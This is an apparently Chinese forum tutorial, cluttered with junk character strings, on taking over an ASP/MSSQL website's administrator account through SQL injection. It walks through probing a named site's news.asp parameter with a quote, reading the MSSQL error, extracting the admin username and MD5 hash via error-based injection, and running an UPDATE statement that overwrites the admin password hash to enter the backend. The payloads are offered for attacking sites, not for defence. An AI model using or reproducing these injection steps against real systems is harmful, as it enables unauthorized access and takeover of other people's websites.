经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。, N! V6 R3 h+ _. O! G- l# w2 n1 e
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)1 t! C% h& k/ v8 }1 `
测试如下:% z* l9 F/ `# X/ O
http://www.tmdsb.com/news.asp?id=1214 `8 S+ C' ], e; O# ?, x/ b
在地址后输入单引号,显示
: z0 Y$ |% v& d4 W; P% QMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’
& j* Q0 s* c* u M3 R字符串 ’’’ 之前有未闭合的引号
% H. f' { M7 D8 r2 k% ?* @/news/tmdws.asp,行639 N; M# R6 Y# c
说明没有过滤单引号且数据库是MSSQL.* n2 Y8 K L. R& v2 n
and 1=1正常。and 1=2出错。肯定存在注入) g7 U; u: V$ j+ y
接着输入
+ Z8 ^# W* X3 U I7 R6 ohttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)2 t& Q2 |2 Y1 h) T% d) ^! [
得到帐号为:admin5 _1 f; X$ g) x! J
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
2 Q/ w8 y" I3 c) k% N. R得到密码为:a4716077c2ba075c& p; F! o- O7 W5 m& T/ V% c& B' o2 x
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
0 u# C* i7 [9 Q( u& C命令如下 :/ B) S; w8 N4 D2 X5 p# E5 d8 ~$ v8 t, J
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
. R! O2 R5 f$ I% Y" b) ?4 ~这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |